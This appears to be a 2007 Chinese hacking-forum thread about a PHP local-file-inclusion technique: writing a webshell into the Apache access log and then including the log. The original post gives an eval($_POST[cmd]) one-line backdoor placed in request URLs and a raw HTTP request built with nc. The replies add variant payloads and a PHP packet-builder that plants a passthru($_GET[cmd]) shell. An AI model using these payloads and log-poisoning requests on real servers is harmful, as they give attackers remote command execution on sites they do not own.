[原创]邪恶的空格——PHP本地文件包含漏洞的新突破口
文章作者:茄子宝信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
记得Zizzy写过一篇《关于php包含ApacheRi志的随想》,这是一个很好的思路,我们可以随意构造
[quote]http://www.exp.com/index[color=#FF0000]<?/**/eval($_POST[cmd]);/**/?>[/color].php[/quote]
这样的GET请求,将一句话木马写入webRi志,然后利用文件包含漏洞包含Ri志得到WEBSHELL.
不过很遗憾,这类情况只能在short_open_tag=on的情况下才能有效,当short_open_tag=off时,PHP将不支持[color=#FF0000]<?/**/eval($_POST[cmd]);/**/?>[/color]这样的短语句.
所以我们只能使用[color=#FF0000]<?php eval($_POST[cmd]);?>[/color]这样标准语法的一句话木马,但是问题来鸟,语句中有一个空格,类似
[quote]http://www.exp.com/index[color=#FF0000]<?php eval($_POST[cmd]);?>[/color].php[/quote]
浏览器中直接这样提交,会把空格做HTTP编码转成%20写入webRi志,如果PHP包含[color=#FF0000]<?php%20eval($_POST[cmd]);?>[/color]这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEBRi志.
直接利用NC伪造GET请求包,这个邪恶的空格便写入了WEBRi志!
[code]GET /index< >.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 192.168.3.44[/code] 关于php包含ApacheRi志的随想
这个文章找不到
还有就是这个把我说的迷迷糊糊的……
还是详细点好 具体的就是那个nc提交GET包 那这个包是从那来的 如果是抓的
抓那个页面 还是自己构造的?
我很菜的 不要鄙视我 只有这样问 我才能进步快点…… 试了一下,米成功。。。Ri志到%20那里被切断了。。 <?php+phpinfo();?>
<?php;phpinfo();?>
怎么样都行,没必要那么麻烦抓包 是很好解决诶
$code="<?php echo FLYH4T;error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}passthru(\$_GET[cmd]);die;?>";
$packet="GET " . $p. $code . " HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: " . $host . "\r\n";
$packet.="Connection: close\r\n\r\n"; 原文在这里 [url]http://s0n9.blog.sohu.com/49155048.html[/url]
我发现这个和服务器有关
我原先是用NC提交个NULL字符进去
结果Ri志里显示NULL字符后的内容截断了 也就是没有
但是把Connection HTTP标头去掉后提交
服务器没有返回响应 NULL字符在Ri志里变成了空格
剑心同志说他试的没有Connection HTTP标头也会马上返回响应 [quote]引用第4楼gary.wing于2007-06-05 21:34发表的 :
<?php+phpinfo();?>
<?php;phpinfo();?>
怎么样都行,没必要那么麻烦抓包[/quote]
你用short_open_tag=off的情况下测下再说吧.
还有不是抓包 .
是直接构造包用NC提交!
页:
[1]